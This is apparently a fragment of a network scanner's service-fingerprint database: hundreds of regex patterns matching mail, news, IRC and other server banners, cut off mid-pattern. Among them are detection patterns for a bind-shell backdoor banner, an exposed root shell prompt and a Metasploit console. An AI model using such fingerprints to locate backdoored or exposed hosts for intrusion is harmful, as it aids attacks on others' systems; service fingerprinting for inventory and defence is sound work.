+\x0e\0\0\0\0\0\0 +NOTICE AUTH :\*\*\* Looking up your hostname\r\nNOTICE AUTH :\*\*\* Found your hostname, cached\r\nNOTICE AUTH :\*\*\* Checking Ident\r\n +NOTICE AUTH :\*\*\* Looking up your hostname\r\nNOTICE AUTH :\*\*\* Checking Ident\r\nNOTICE AUTH :\*\*\* No ident response\r\n +NOTICE AUTH :\*\*\* Looking up your hostname\r\nNOTICE AUTH :\*\*\* Checking Ident\r\nNOTICE AUTH :\*\*\* Couldn't look up your hostname\r\n +ERROR..Your host is trying to \(re\)connect too fast -- throttled\r\n +CAPAB START\r\nCAPAB MODULES [\w_-]+\.so, +CAPAB START 1202\r\n +:([\w._-]+) NOTICE ZUSR :You have been throttled for 2 minutes for too many connections in a short period of time\. Further connections in this period will reset your throttle and you will have to wait longer\.\r\n +ERROR Your host is trying to \(re\)connect too fast -- throttled\r\n +IRCXPRO ([\w._-]+)\r\nAUTHREQUEST :Authentication Required\r\n +:([\w._-]+) 451 \* HELP :No te has registrado\r\n +:([\w._-]+) NOTICE AUTH :Minbif-IRCd initialized, please go on\r\n +:.*!psyBNC@lam3rz\.de NOTICE \* : +:.*!psyBNC@[-\w_.]+ NOTICE \* :psyBNC on ([-\w_.]+)\r\n +:sbnc!sbnc@sbnc\.soohrt\.org NOTICE \* :Wellcum\r\n +\0\0\0.\x08\x01\x04\x01\0..\0\0..\0\0.\0\0\0..\0\0\x80\x04..\0.\0\xa0\0\0 +.*\0\x18Ixia Hardware I/O Server\x13Ixia Communications\x18Ixia Hardware I/O Server\x0b([\d.]+) +\r\nWelcome to the Ixia Socket/Serial TCL Server\r\nPress Ctrl-C to reset Tcl Session\r\nIxia> +JDWP-Handshake +cpu: *[\d.]+ mem: *[\d.]+ swp: *[\d.]+\0 +\xde\xca\xfb\xad\x01\0\0\0\x04\0\t\0[\x07\x10] +ksysguardd ([\d.]+)\n\(c\) +\d+ .*\n\x000 succeeded\n\0 +0 succeeded\n\0 +220 ([-.\w]+) LMTP Cyrus v(\d[-.\w]+) ready\r\n +220 ([\w._-]+) Cyrus LMTP Murder v([\w._-]+) server ready\r\n +220 ([-\w_.]+) LMTP Cyrus v([\d.]+)-Red Hat [\d.-]+ ready\r\n +220 ([-\w_.]+) DBMail LMTP service ready to rock\r\n +220 DSPAM LMTP ([-\w_.]+) Ready\r\n +\x01\*Nsure Audit Novell NetWare \[\w+:\w+\]\r\n +LNS READY<> +0001;2 +\x80\0\0\\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\xff\xff\xff\xff\xff\xff\xff\xff\0\0\0\0\0\0\0\0\0\0\0\0 +\xc1, +\n.*=\[ msf v([^\r\n]+)\r?\n.*\d+ exploits.*\d+ payloads.*\d+ encoders.*\d+ nops.*msf > +MIDASd v([\w.]+) connection accepted\n\xff +\xff\0\x17Took too long to log in +merovingian:2:\w+:\n +MudNames ([\d.]+) - \(C\) 1997-2001 Ragnar Hojland Espinosa \n\r +# munin node at ([-\w_.]+)\n +MULTIPLICITYP + [\d.:a-f]+ is connected as <\w+>\.\n already connected: (.*?)\.\n +\xd6\x81\x81\0\0\xf9\0\xf9\xee\xe3\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0 +\x80\0\0\\0\0\0\x01....\0\0\0\0\0\0\x05\x02\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\x03\0\0\0\0|s p|Symantec/Veritas Backup Exec ndmp +>>messages/login\r\n----- Welcome to the No Name Go Server \(NNGS\) -----\r\n\r\n +.*\0\0\0\x06\0Donkey\x01\x0c\0\./donkey\.ini\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0 +\xff\xfd\x1f[\r\n* ]+Welcome to MLdonkey \r\n +\xff\xfd\x1fWelcome to MLDonkey ([\d.]+)\n\x1b\[3.mWelcome on mldonkey command-line\x1b\[2;37;0m\n\nUse \x1b\[31m\?\x1b\[2;37;0m for help\n\n\x1b\[7mMLdonkey command-line:\x1b\[2;37;0m\n> +\xff\xfd\x1fWelcome to MLdonkey, visit http://mldonkey\.dyndns\.info for new Versions\n\x1b\[34mWelcome on mldonkey command-line\x1b\[2;37;0m\n\nUse \x1b\[31m\?\x1b\[2;37;0m for help\n\n\x1b\[7mMLdonkey command-line:\x1b\[2;37;0m\n> +[\x00-\x10]\0\0\0\0\0[^\0]\0\0\0 +\xac\xed\0\x05sr\0\x1elia\.Monitor\.monitor\.monMessage\x8e\xf8\xad\xb0\x14\xe6`!\x02\0\x03L\0\x05identt\0\x12Ljava/lang/Object;L\0\x06resultq\0~\0\x01L\0\x03tagt\0\x12Ljava/lang/String +\n\r\xff\xfbUDo you want ANSI color\? \(Y/n\) | p/ROM-based MUD/ i|http://rrp.rom.org/ +VERSION=MYPROXYv([\w._-]+)\nRESPONSE=1\nERROR=authentication failed\n\0 +.\0\0\0\xffj\x04Host hat keine Berechtigung, eine Verbindung zu diesem MySQL Server herzustellen\. +.\0\0\0\x0a([\w._-]+)\0............\0\x5f\xd1\x2d\x02\0\0\0\0\0\0\0\0\0\0\0\0\0\0............\0 +.\0\0\0\n(6\.[-_~.+\w]+)\0...\0 +.\0\0\0\xffj\x04'[\d.]+' .* MySQL +.{128}[\x46-\x53]... +200 NCID Server: ARC_ncidd ([\w._-]+)\r\nCIDLOG: \*DATE\* +Active Internet connections\nProto Recv-Q Send-Q Local Address Foreign Address \(state\)\n +netstat: invalid option -- f\nusage: netstat \[-veenNcCF\] +\x01\0\0\0\x01\0\0\0\0\0\0\0\n\x0c00\d{10} +\x06\x02...([\w._@-]+).. +smbd: error while loading shared libraries: libattr\.so\.1: cannot open shared object file: No such file or directory\n +502 You have no permission to talk\. Goodbye.\r\n +200 NNTP Service Microsoft\xae Internet Services (\d[-.\w]+) Version: \d+\.\d+\.\d+\.\d+ Posting Allowed \r\n +200 ([-.\w]+) DNEWS Version *(\d[-.\w]+).*posting OK \r\n +200 Leafnode NNTP Daemon, version (\d[-.\w]+) running at +200 Lotus Domino NNTP Server for ([-./\w]+) \(Release (\d[-.\w]+), .*\) - Not OK to post\r\n +20. ([-.\w]+) InterNetNews NNRP server INN (\d[-.\w ]+) ready \(no posting\)\.\r\n +200 ArGoSoft News Server for WinNT/2000/XP v ([\d.]+) ready\r\n +200 ([\w.-_]+) NetWare-News-Server/([\d.]+) 'LDNUM' NNRP ready \(posting ok\)\.\r\n +200 ([-\w_.]+) NNRP Service Ready - [-\w_.]+@[-\w_.]+ \(posting ok\)\.\r\n +200 ([-\w_.]+) InterNetNews server INN ([\d.]+) ready\r\n +200 nntp//rss v([\d.]+) news server ready\r\n| p|nntp//rss nntpd +200 Hi, you can post \(sn version ([\w.]+)\)\r\n +200 ([-\w_.]+) NNTP Service Ready, posting permitted\r\n +200 Jana news server ready - posting allowed\r\n +200 NNTP server NOFFLE ([\w.]+)\r\n +502 Could not get your access name\. Goodbye\.\r\n +201 NNTP server ready \(no posting\)\r\n502 No permission\r\n +200 ([-\w_.]+) - colobus ([\d.]+) ready - \(posting ok\)\.\r\n +200 +Kerio MailServer ([\d.]+) +NNTP server ready\r\n +200 NewsCache ([-\w_.]+), accepting NNRP commands\r\n +200 ([\w._-]+) Cyrus NNTP v([\w._-]+) server ready, posting allowed\r\n +200 ([-\w_.]+) ready for action \(Mailtraq ([\d.]+)/NNTP\)\r\n +200 Service available, posting allowed\r\n +200 ([-\w._]+) InterNetNews NNRP server INN (.*) ready \(posting ok\)\r\n +200 [-\[\]\(\)!,/+:<>@.\w ]*nntp[-\[\]\(\)!,/+:<>@.\w ]*\r\n +[4f]\0\0\0V4\x12\0\0\0\0\0\0\0\0\x00[4f]\0\0\0.\0\xf0\0\xd3\x07\t\0.\0.\0.\0.\0.\0..\0\0\0\0.\0\0\0..\0\0.\0 +.\0\x02\0([^\0]+)\0+.\0\x01\0 +200 OK [\d.]+ ([\w._-]+) oco-([\w._-]+) \n +\0X\x08\0\}\x08\r\n\0\.\x08.*\.\.\.\r\n +pbmasterd(\d[-.\w]+)@[-.+\w]+: +PJLINK 1 [0-9a-f]{8}\r +201 Welcome to Poweroff ([\d.]+) created by Jorgen Bosman\r\n +\x01\x04\0\0\0\0\0\rD +NotAuthorized\0\0\0\0\0\0\0\0\0\0\0\0 +usage: [/\w]*/etc/pksd\.conf conf_file\n +version report\n +welcome to the pioneers-meta-server version ([\d.]+)\n +\+ POP2 ([\w._-]+) ([\w._-]+) server ready\r\n +\+OK Ready when you are <200\d+\. +\+OK Internet Rex POP3 server ready < +\+OK DBMAIL pop3 server ready to rock < +\+OK ([-.+\w]+) NetMail POP3 Agent \Re..sion: ([\d.]+) \\r\n +\+OK ([-.+\w]+) Merak (\d[-.\w]+) POP3 +\+OK \]-:\^:-\[ \]-:\^:-\[ POP3 +\+OK POP3 Ready <\d{3,6}\.1[012]\d{8}@([-.\w]+)>\r\n +\+OK [Dd]ovecot ready\.\r\n +\+OK [Dd]ovecot on ([\w._-]+) ready\.\r\n +\+OK Teapop \[v?(\d[-.\w ]+)\] - Teaspoon stirs around again .*\r\n +\+OK ready \r\n +\+OK POP3 server ready \r\n +\+OK AppleMailServer (\d[-.\w]+) POP3 server at ([-.\w]+) ready <\d +\+OK Welcome to MailEnable POP3 Server +\+OK ready <\d{1,5}\.10\d{8}@([-.\w]+)>\r\n +\+OK UCB based pop server \(version (\d[-.\w]+) at sionisten\) starting\.\r\n +\+OK Lotus Notes POP3 server version ([-.\w]+) ready .* on ([^/]+)/([^\.]+)\.\r\n +\+OK Lotus Notes POP3 server version ([-.\w]+) ready on +\+OK ([-.\w]+) POP3 service \(Netscape Messaging Server (\d[^(]+) \(built ([\w ]+)\)\)\r\n +\+OK ([-.\w]+) Cyrus POP3 v(\d[-.\w]+) server ready < +\+OK ([-.\w]+) Cyrus POP3 v(\d[-.\w]+)-Red Hat [-\d.]+ server ready < +\+OK ([-.\w]+) Cyrus POP3 v(\d[-.\w]+)-OS X ([\d.]+) server ready < +\+OK ([-\w_.]+) Cyrus POP3 v(\S+Debian\S+) server ready +\+OK X1 NT-POP3 Server ([-\w.]+) \(IMail ([^)]+)\)\r\n +\+OK POP3 \[cppop (\d[^]]+)\] at \[ +\+OK Microsoft Exchange 2000 POP3 server version (\S+).* ready\.\r\n +\+OK Microsoft Exchange POP3 server version (\S+) ready\r\n +\+OK Der Microsoft Exchange Server 2003 POP3-Server, Version ([\d.]+) \(([-\w_.]+)\), steht zur Verf\xfcgung\.\r\n +\+OK Microsoft Exchange Server 2003 POP3 \xb7\xfe\xce\xf1\xc6\xf7\xb0\xe6\xb1\xbe ([\d.]+) \(([-\w_.]+)\) +\+OK Microsoft Exchange POP3-server versie ([\d.]+) is gereed\.\r\n +\+OK \xd1\xe5\xf0\xe2\xe5\xf0 Microsoft Exchange POP3 \xe2\xe5\xf0\xf1\xe8\xe8 ([\d.]+) \xe3\xee\xf2\xee\xe2\r\n +\+OK Le serveur POP3 Microsoft Exchange Server 2003 version ([\d.]+) \(([-\w_.]+)\) est pr\xeat\.\r\n +\+OK Microsoft Exchange POP3 server verze ([\d.]+) je p\xf8ipraven\.\r\n +\+OK Server POP3 di Microsoft Exchange Server 2003 versione ([\w._-]+) \(([\w._-]+)\) pronto\.\r\n +\+OK Microsoft Exchange Server 2007 POP3 service ready\r\n +\+OK ([-.\w]+) POP3 server \(Netscape Mail Server v(\d[-.\w])\) ready +\+OK ArGoSoft Mail Server Freeware, Version \S+ \(([^)]+)\)\r\n +\+OK ArGoSoft Mail Server POP3 Module v\.([\w._-]+) at +\+OK ArGoSoft Mail Server Pro for WinNT/2000/XP, Version [-.\w]+ \(([-.\w]+)\)\r\n +\+OK ([-\w.]+) ArGoSoft Mail Server Pro for WinNT/2000/XP, Version [\d.]+ \(([\d.]+)\)\r\n +\+OK ArGoSoft Mail Server Plus for WinNT/2000, Version [\d.]+ \(([\d.]+)\)\r\n +\+OK ([-.\w]+) Execmail POP3 \((\d[^)]+)\) +\+OK ([-.\w]+) POP3? MDaemon ready using UNREGISTERED SOFTWARE ([\d.]+) \r\n +\+OK ([-\w_.]+) POP MDaemon ([\d.]+) \xd7\xbc\xb1\xb8\xba\xc3 \r\n +\+OK ([-.\w]+) POP3 server \(Post\.Office v([-.\w]+) release ([-.\w]+) with ZPOP version ([-.\w]+)| p/Post.Office pop3d/ v/2 release 3/ i|w/ZPOP 4 +\+OK CommuniGate Pro POP3 Server ([-.\w]+) ready +\+OK CommuniGate Pro POP3 Server ready <[\d.]+@([-\w_.]+)>\r\n +\+OK\r\n +\+OK POP3 v?([\d.]+) server ready <[\w.]+@([-\w_.]+)>\r\n +\+OK POP3 server ready <\w{11}>\r\n +\+OK Kerio MailServer (\d[-.\w]+) POP3 server ready <([-.\w@:]+)>\r\n +\+OK Kerio MailServer (\d[-.\w]+) POP3 server ready < +\+OK Kerio MailServer (\d[-.\w]+) patch ([\d.]+) POP3 server ready <[\d.]+@\(null\)>\r\n +\+OK Stalker POP3 Server ([\w.]+) at ([-\w_.]+) ready <.*>\r\n +\+OK ([-\w_.]+) POP3 service \(iPlanet Messaging Server ([-\w_.\s]+) \(built .*\)\)\r\n +\+OK Messaging Multiplexor \(iPlanet Messaging Server ([-\w_.\s]+) \(built .*\)\)\r\n +\+OK InterMail POP3 server ready\.\r\n +\+OK WinRoute Pro ([\d.]+) POP3 server ready <[-\w_.]+@unspecified.host>\r\n +\+OK WinRoute Pro ([\d.]+) POP3 server ready <[-\w_.]+@([-\w_.]+)>\r\n +\+OK ([-\w_.]+) POP3 server \(Netscape Messaging Server - Version ([\d.]+)\) ready .*\r\n +\+OK [-\w_.]+ PopMax version ([\d. ]+) POP3 Mail Server Ready, Willing, and Waiting\r\n +\+OK POP3 Welcome to GNU POP3 ([-\d.]+) <[\d.]+@([-\w_.]+)>\r\n +\+OK popserver ([\d.]+) pop3 server ready\r\n +\+OK ([-\w_.]+) NetMail POP3 Agent \R...sion: ([\d.]+) \\r\n +\+OK POP3 server ready \(Worldmail ([\d.]+)\) <[\w.]+@([-\w_.]+)>\r\n +\+OK ([-\w_.]+) POP3 WorkgroupMail ([\d.]+) .*\r\n +\+OK POP3 server ready \(LSMTP v([\w.]+)\) <[\w.]+@([-\w_.]+)>\r\n +\+OK MERCUR POP3-Server \(v([\d.]+) \w+\) for Windows NT ready <[\d.]+@([-\w_.]+)>\r\n +\+OK POP3 server ready QuickMail Pro Server for MacOS ([\d.]+) <[\w.]+@([-\w_.]+)>\r\n +\+OK ready\r\n +\+OK POP3 ([-\w_.]+) \(Version ([-\w.]+)\) http://surgemail\.com\r\n +\+OK ([-\w_.]+) running Eudora Internet Mail Server X ([\d.]+) < +\+OK <[\d.]+@([-\w_.]+)> \[XMail ([\d.]+) POP3 Server\] service ready; +\+OK <[\d.]+@([-\w_.]+)> \[XMail ([\d.]+) \(Linux/Ix86\) POP3 Server\] service ready; +\+OK Samsung Contact POP3 interface ready on: ([-\w_.]+)\r\n +\+OK ([-\w_.]+) POP3 service \(Sun Java\(tm\) System Messaging Server ([-\d.]+) \(built .*\) +\+OK Messaging Multiplexor \(Sun Java\(tm\) System Messaging Server (\d[-\w_.]+) \(built .*\)\)\r\n +\+OK ([-\w_.]+) POP3 server \(DeskNow POP3 Server ([\d.]+)\) ready \r\n +\+OK POP3 SINA \(([-\d.]+)\) Server Ready\r\n +\+OK POP3 on WebEasyMail \[([\d.]+)\] ready\. http://www\.51webmail\.com\r\n +\+OK \(POP3\) hMailServer ([-\w.]+)\r\n +\+OK Welcome to ([\w._-]+), with Code-Crafters Ability Mail Server ([\w._-]+) <[\d.]+@[\w._-]+>\r\n +\+OK DAWKCo POP3 Server v([-\w_.]+) ready < +\+OK Welcome to ([-\w_.]+), powered by Ocean Mail Server ([\d.]+) <[\d.]+@[-\w_.]+>\r\n +\+OK ([-\w_.]+) Solstice \(tm\) Internet Mail Server \(tm\) POP3 ([\d.]+) +\+OK Welcome to RaidenMAILD POP3 service v([\d.]+), +\+OK POP3 FTGate6 server ready <[\d.]+@([\w._-]+)>\r\n +\+OK MERCUR POP3-Server \(v([-\w_.]+) \w+\) for Windows ready <[\d.]+@([-\w_.]+)>\r\n +\+OK 4D Mail ([-\w_.]+) ready < +\+OK ([-\w_.]+) POP3 ([-\w_.()]+) w/IMAP client at +\+OK <-?[\d.]+@([-\w_.]+)>, POP3 server ready\.\r\n +\+OK POP3 server ready <[-0-9a-f]+@([-\w_.]+)>\r\n +\+OK Welcome to Arvixe POP3 server\.\r\n +\+OK POP3 Server ready\r\n +\+OK POP3 server ready\r\n +\+OK POP3 server ([-\w_.]+) ready <[\d.]+@[-\w_.]+>\r\n +\+OK ([-\w_.]+) POP3 Server \(Version ([\w.]+)\) ready at <.*>\r\n +\+OK popd-([\d.]+) ready \r\n +\+OK POP3 server at ([-\w_.]+) ready <[\d.]+@ +-ERR Permission denied - closing connection\.\r\n +\+OK ([-\w_.]+) <[\d.]+@[-\w_.]+>\r\n +\+OK <[\d.]+@([-\w_.]+)>\r\n +\+OK POP3 server ready <[\d.]+@([-\w_.]+)>\r\n +\+OK ready <[\d.]+@([-\w_.]+)>\r\n +\+OK Scalix POP3 interface ready on: ([-\w_.]+)\r\n +\+OK POP3 Welcome to ([-\w_.]+) using the Internet Anywhere Mail Server Version: ([\d.]+)\. Build: (\d+) by True North Software, Inc\. +\+OK Welcome to mpopd V([\d.]+)\.\.\.\. :\)\r\n +\+OK [-\w_.]+ Welcome to the mail server\.\r\n +\+OK CMailServer ([\d.]+) POP3 Service Ready\r\n +\+OK ([-\w_.]+) running EIMS X ([\w.]+) < +\+OK POP3 server \(Neon Mail Server System Advance ([-\w_.]+), [^)]*\) ready ([-\w_.]+)\. < +\+OK Welcome to the Atmail POP3 server - Login with user@domain\.\r\n +\+OK Dovecot DA ready\.\r\n +Unable to open trace file \"/var/spool/popper/ +\+OK POP3D\(\*\) Server PMDFV([\w._-]+) at .* <\w+@([\w._-]+)>\r\n +\+OK Pop3 ready\.\r\n +\+OK ([\w._-]+) Cyrus POP3 v([\w._-]+)-OS X Server ([\w._-]+):\t9L1 server ready <[\d.]+@[\w._-]+>\r\n +\+OK Kerio Connect ([\w._ -]+) POP3 server ready <[\d.]+@([\w._-]+)>\r\n +\+OK Welcome NewsGator Online Services POP3 Server version ([\w._-]+)\r\n +\+OK POP3 AnalogX Proxy (\d[-.\w]+) \(Release\) ready\.\n +Proxy\+ POP3 server\. Insecure access - terminating\.\r\n +\+OK Proxy-POP server \(DeleGate/([\d.]+) by ysato AT delegate DOT org\) at ([-\w_.]+) starting\.\r\n +\+OK POP3 Y(?:ahoo)?POPs! proxy ready\r\n +\+OK POP3 \(Spampal\) server ready \(USER command must include mailserver name\)\r\n +\+OK Mirapoint POP3PROXY ([-\w.]+) server ready\r\n +\+OK AVG POP3 Proxy Server Beta - ([\d/.]+) \[[\d.]+\]\r\n +\+OK AVG POP3 Proxy Server ([\d/.]+) \[[\w/.]+\]\r\n +\+OK AVG POP3 Proxy Server <[\w.]+@[-\w_.]+> ([\d/.]+) \[[\d/.]+\]\r\n +-ERR AVG POP3 Proxy Server: Cannot connect to the mail server!\r\n +\+OK POP3 Spam Inspector Spam Filter Gateway Version ([\d.]+) Ready\.\r\n +\+OK MailMarshal\(([\d.]+)\) POP3 server ready <[\d.]+@([-\w_.]+)>\r\n +\+OK HTML2POP3 server ready \(([\d.]+)\)\r\n +\+OK ([-\w_.]+) POP3 proxy ready\r\n +\+OK AVG POP3 Proxy Server <[\d.]+@([-\w_.]+)> ([\d.]+)/[\d.]+ \[[\d/.]+\]\r\n +\+OK InterScan VirusWall POP3 Proxy\r\n +-ERR 403 The requested host is forbidden by WinProxy\. See your network administrator\.\n +\+OK MrPostman webmail proxy ready\r\n +\+OK F-Secure/fsigk_pop/\d+/[-\w_.]+ starting\.\r\n +\+OK hello from popgate\(([\d.]+)\)\r\n +\+OK \[ISafe POP3 Proxy\] \r\n +\+OK <[\d.]+@([-\w_.]+)> \[ISafe POP3 Proxy\] \r\n +\+OK UserGate: forward ready\r\n-ERR UserGate: Mistake of the protocol\r\n +\+OK kingate pop3 proxy\r\n +\+OK avast! POP3 proxy ready\.\r\n +\+OK O3SIS UMA Proxy POP3 Server ([\w._-]+)\r\n +200 ([-._\w]+) poppassd v?([-._\w]+) +200 poppassd hello, who are you\?\r\n +200 hello there, who are you\?\r\n +200 hello there, please tell me who you are\r\n +200 poppassd v([\w.]+) for Digital Unix with C2 security Hello, who are you\?\r\n +200 ([-.+\w]+) MercuryW PopPass server ready\.\r\n| p|Mercury/32 poppass service +200 X1 NT-PWD Server ([-.+\w]+) \(IMail (\d[-.\w]+)\)\r\n +200 CommuniGate Pro PWD Server (\d[-.\w]+) ready < +550 Login failed - already \d+/\d+ users connected sorry \(use G_CON_PERIP_EXCEPT to bypass\) \(IP=[\d.]+\)\r\n +200 Post\.Office v([\d.]+) password server ready\r\n +\+OK [-\[\]\(\)!,/+:<>@.\w ]+\r\n +lpd \[@([-\w_.]+)\]: connected from invalid port \(\d+\)\n| p|BSD/Linux lpd +lpd: Host name for your address \(\d+\.\d+\.\d+\.\d+\) unknown\n +([-\w_.]+): /usr/lib/lpd: Malformed from address\n +\d+-201 ill-formed FROM address\. +\0\.[\w._/-]+/Library/Preferences/PyCharm([\w._-]+)\0\)[\w._/-]+/Library/Caches/PyCharm[\w._-]+ +QAS2 +\0\0\x01V\xff\xff\xff\xff\xff\xffRT\0\x124V\x08\0E.\x01H...\0.\x11..\0\0\0\0\xff\xff\xff\xff\0D\0C\x014.{1,2}\x01\x01\x06\0......\0{18}RT\0\x124V\0{202}c\x82Sc5\x01 +\r\nHello, this is [Qq]uagga \(version (\d[-.\w]+)\)\.\r\nCopyright 1996-200 +200-?RAP 1 ([-\w_.]+) ([-\w_.]+) radmind access protocol\r\n +\0.\0\x01\0\0\0\0.*\x0b\0\0\0\0([-\w_]+)\x00437 +_realplayfavs_::([\w\s]+)::connected\0 +(\d+\.\d+\.\d+) G\0\0\0\xb6\0.\t +\xe1\xe7\xef\xf0\0\0\x00.\(Righteous Backup Linux Agent\) ([^\xe1]+)\xe1\xe7\xe6\x07\0\x01\0 +\xe1\xe7\xe6\x07\0\x01\0 +roku: ready\r\n +\+host=cashew version=([\d.]+) uptime=[\d+:]+ audio-bits=\d+ audio-byte-order=\w+-endian +\0\0\0.NI_RTERR\0.\0\0\xff\xff\xff\xfb\0\0\0.\*ERR\*\x001\0connection timed out\0-5\0NI \(network interface\)\x007\d0\x003\d\0nirout\.cpp\x00\d\d\d\d\0RTPENDLIST::timeoutPend: CONNECTED timeout\0\w+ +\w+ +\d+ +\d+:\d+:\d+ +\d+\0\0\0\x0046\0SAProuter ([\w._ ()-]+) on '([\w._-]+)'\0\0\0\0\0\*ERR\*\0\0\0\0\0 +\x02\x1c50\x1c\x03\0\0\0\0 +\"IMPLEMENTATION\" \"Cyrus timsieved v([\w._-]+-Debian[- ][\w._+-]+)\"\r\n +\"IMPLEMENTATION\" \"Cyrus timsieved \(Murder\) v([-.\w]+)\"\r\n +\"IMPLEMENTATION\" \"Cyrus timsieved v([\w_.]+)-OS X ([^"]+)\"\r\n +\"IMPLEMENTATION\" \"Cyrus timsieved v(\d[-.\w]+)\"\r\n| p/Cyrus timsieved/ v/1/ i|included w/cyrus imap +\"IMPLEMENTATION\" \"dovecot\"\r\n +\"IMPLEMENTATION\" \"DBMail timsieved ([\w._-]+)\"\r\n +/usr/share/pysieved/plugins/dovecot\.py:27: DeprecationWarning: The popen2 module is deprecated\. Use the subprocess module\.\n import popen2\n\"IMPLEMENTATION\" \"pysieved ([\w._+-]+)\"\r\n +\"IMPLEMENTATION\" \"Dovecot Pigeonhole\"\r\n\"SIEVE\" \"[\w._;-]+(?:\s+[\w._;-]+)*\"\r\n\"NOTIFY\" \"mailto\"\r\n\"SASL\" \"[\w._;-]*(?:\s+[\w._;-]+)*\"\r\n\"STARTTLS\"\r\n\"VERSION\" \"([\w._-]+)\"\r\nOK \"Dovecot ready\.?\"\r\n +SGMS Scheduler SGMS (\d+) ([\d.]+) .*\n> +t\x03\0\0 +\x01remshd: Kerberos Authentication not enabled\.\n +\x01remshd: Error! Kerberos authentication failed +(?:ba)?sh-\d\.\d\d\w?# +:: w4ck1ng-shell \(Private Build v([\w._-]+)\) bind shell backdoor :: \n\n +GENERAL: \d+ \d+\n +220 SLNP (\w+)@[vV]ersion:\s?V?([^@]+)@user:([^@]+)@pid:\d+\n +220 ([-\w_.]+) PGP Universal service ready \(proxied server greeted us with: (.*)\)\r\n +220 ([-/.+\w]+) MailGate ready for ESMTP on +220 ([-/.+\w]+) SMTP ready to roll\r\n +220 ([-/.+\w]+) Internet Rex ESMTP daemon at your service\.\r\n +220 ([-.+\w]+) ESMTP NetIQ MailMarshal \d[-.\w]+ Service Pack (\w+) \(v(\d[-.\w]+)\) Ready\r\n +554-([-.+\w]+)\.us\r\n554 Access denied\r\n +220.*?MERCUR SMTP[\s-]Server \(v([^)]+)\) for ([-.\w ]+) ready at +220 ([-.\w\d]+) ESMTP \([a-fA-F0-9]{32}\)\r\n +554 Service unavailable; Client host \[[\w._-]+\] blocked using Barracuda Reputation; +220 ([-.+\w]+) Mercury/32 v(\d[-.\w]+) ESMTP server ready\.\r\n| p|Mercury/32 smtpd +520 Connection not authorised from this address\.\r\n +554 SMTP service not available\r\n +220 ([-\w_.]+) <1\d+\.\d+@[-\w_.]+> \[XMail (\d[-.\w]+) ESMTP Server\] service ready +421 \[XMail ([\d.]+) \(Linux/Ix86\) ESMTP Server\] - Server does not like Your IP\r\n| p/XMail SMTP server/ v/1/ i|Linux/x86 +220 ([-.\w]+) FirstClass ESMTP Mail Server v(\d[-.\w]+) ready\r\n +220 ([-.\w]+) AppleMailServer (\d[-.\w]+) SMTP Server Ready\r\n +220 ([-.\w]+) eXtremail V(\d[-.\w]+) release (\d+) rev(\d+) ESMTP server ready \.\.\.\r\n +220 ([-.\w]+) service desk (\d[-.\w]+) SMTP Service Ready for input\.\r\n +220 ([-.\w]+) VPOP3 SMTP Server Ready\r\n +421 Insufficient System Storage\.\(IMail ([\d.]+)\)\r\n +220 \[?([-.+\w]+)\]? Microsoft ESMTP MAIL Service, Version: ([-\w.]+) ready +220 ([-\w_.]+) Microsoft ESMTP MAIL Service ready at +220 ([\w._-]+) Microsoft ESMTP MAIL Service Version: ([\w._-]+)\r\n +220 ([-.+\w]+) ESMTP Server \(Microsoft Exchange Internet Mail Service ([-\w.]+)\) ready +220 \+OK Microsoft Exchange SMTP server version ([\d.]+) +220[- ].*\r\n220[- ]([^\r\n]+) ESMTP Exim +220 CheckPoint FireWall-1 secure ESMTP server\r\n +220 CheckPoint FireWall-1 secure SMTP server\r\n +220 ([-.+\w]+) running IBM AS/400 SMTP V([\w]+)| p|IBM AS/400 smtpd +220 ([-.+\w]+) ESMTP MailEnable Service, Version: (\d[\w.]+)- ready at +220 ([-.+\w]+) ESMTP MailEnable Service, Version: \d+--([\d.]+) ready at +220 ([-.+\w]+) ESMTP MailEnable Service, Version: ([\w._-]+) ready at +530 ([-.+\w]+) ESMTP MailEnable Service, Version: ([\w._-]+) denied access at +220 ([-.+\w]+) SMTP/smap Ready\.\r\n +220 ([-.+\w]+) ESMTP service \(Netscape Messaging Server ([-.+ \w]+) \(built +220-InterScan Version (\S+) .*Ready\r\n220 ([-.+\w]+) NTMail \(v([-.+\w]+)/.* ready +220-InterScan Version (\S+) .*Ready\r\n220 ([-.+\w]+) ESMTP Postfix\r\n +220-InterScan Version (\S+) .*Ready\r\n220 ([-.+\w]+) Microsoft ESMTP MAIL Service, Version: ([\d.]+) ready at +220 Trend Micro ESMTP ([-.+\w]+) ready\.\r\n +220(\S+) WebShielde(\w+)/SMTP Ready. +220 ([-.+\w]+) ESMTP MailMasher ready to boogie\r\n +220 ([-.\w]+) ESMTP Postfix \(([-.\w]+)\) \(([-.\w ]+)\) +220 [\*\d\ ]{2,300}\r\n +220 ArGoSoft Mail Server Pro for WinNT/2000/XP, Version ([-.\w]+) \(([-.\w]+)\)\r\n +220 ([-\w.]+) ArGoSoft Mail Server Pro for WinNT/2000/XP, Version [\d.]+ \(([\d.]+)\)\r\n +220 ([-\w.]+) ArGoSoft Mail Server, Version [\d.]+ \(([\d.]+)\)\r\n +220 ([-\w_.]+) ArGoSoft Mail Server Freeware, Version [\d.]+ \(([\d.]+)\)\r\n +220 ([-.\w]+) ESMTP Service. Welcome.\r\n +220 ([-.\w]+) Mercury (\d[-.\w]+) ESMTP server ready\.\r\n +220 ESMTP Service \(Lotus Domino Release ([\w._-]+)\) ready at +220 ([-.\w]+) ESMTP Service \(Lotus Domino Release (\d[-.\w ]+)\) ready +220 ([-.\w]+) ESMTP Service \(Lotus Domino (\d[-.\w ]+)\) ready at +220 ESMTP Service \(Lotus Domino Build V([\w_]+) Beta (\w+)\) ready at +220 ([-.\w]+) ESMTP Service \(Lotus Domino Versione ([\w._ -]+)\) ready +220 ([-.\w]+) Lotus SMTP MTA Service Ready\r\n +220 ([-.\w]+) WebSTAR Mail Simple Mail Transfer Service Ready\r\n +220 ([-.\w]+) SMTP NAVGW (\d[-.\w]+); +220 ([-.\w]+) Kerio MailServer (\d[-.\w]+ patch \d+) ESMTP ready\r\n +220 YSmtp(\S+) ESMTP service ready +220 (\S+) ESMTP WEB.DE V([^\s\;]+) +220 Compuserve Office Mail Service \(lnxc-(\d+)\) ESMTP +220 Welcome to Nemesis ESMTP server on \S+ +220 (\S+).*?SMTP \(Sun Internet Mail Server sims.(\d[^\)]+)\) +220 (\S+) ESMTP XWall v(\d\S+) +220 (\S+) eMail Sentinel (\d+) ESMTP Service ready +220 ([-\w_.]+) Service ready by DvISE PostMan \((\d+)\) ESMTP Server \(Tobit Software, 